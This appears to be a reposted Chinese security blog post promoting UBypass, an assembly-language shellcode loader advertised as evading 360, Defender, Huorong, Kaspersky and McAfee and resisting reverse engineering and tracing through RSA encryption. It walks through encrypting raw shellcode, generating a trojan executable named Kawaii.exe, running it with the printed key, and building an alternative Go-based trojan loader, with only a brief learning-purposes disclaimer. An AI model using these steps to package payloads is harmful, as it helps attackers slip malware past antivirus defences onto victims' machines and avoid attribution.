2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡

渗透技巧 7个月前 admin
180 0 0

        这是一个基于纯汇编语言绕过动/静态检测的Shellcode Loader,也可以直接当做免杀使用,使用了2048位秘钥的RSA进行防止逆向,可以有效避免被溯源,当然,需要携带秘钥作为启动参数

2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡

2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡

2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡

2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡

2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡

2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡


首先准备好一段shellcode(RAW编码)保存在aaa.bin(命名随意)中,然后使用UBypass进行加密,如下

PS D:DatafixablecodeWindowsShellcodeInjectorRelease> .WindowsShellcodeInjector.exe .calc.bin[*] Generated Private Key => gPT6SIbOa;od,u`vbg/;:kcS;k+=S%@ob]Cz&~<=[*] Your Padding Original Shellcode Size is 280[*] Your Padding Encrypted Shellcode Size is 560[*] Your Encrypted Shellcode is f30d0f241eafbe062451e23a3ede47419f06cbc36802ea49e23beb1caaa3dc008f4fa95bf85cc18235383bc8593411345e4485af8cd58a52e9500e0d5664760a99d5ef9d0727d70d582563959b016b1c2069a149cdddcd5fc

随后会在当前文件夹生成一个Kawaii.exe即为携带了你的shellcode的马子,使用的时候加上私钥即可,如下

PS D:DatafixablecodeWindowsShellcodeInjectorRelease> .Kawaii.exe 'gPT6SIbOa;od,u`vbg/;:kcS;k+=S%@ob]Cz&~<='

使用golang加载DLL

使用方法如下

如果你不喜欢默认的C++加载器,你也可以使用golang加载器,毕竟C++的特征过于明显,很容易被杀软检测到,使用方法如下

  1. 首先你需要将本项目编译为DLL

  2. 使用go编译go_bundle.go生成木马文件

go run go_bundle.go muma

其中muma为生成的木马文件名,可以自定义,具体建议看代码

  1. 将生成的木马文件和DLL文件放在同一目录下,然后运行木马文件即可


免责声明

本项目仅供学习交流使用,请勿用于非法用途,否则后果自负,与本公众号无关


项目地址:

https://github.com/Yeuoly/0xUBypass

原文始发于微信公众号(可汗安全团队):2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡

版权声明:admin 发表于 2023年11月20日 上午8:31。
转载请注明:2023.11.15 免杀3*0,DF,火*,咔吧,M咖啡 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...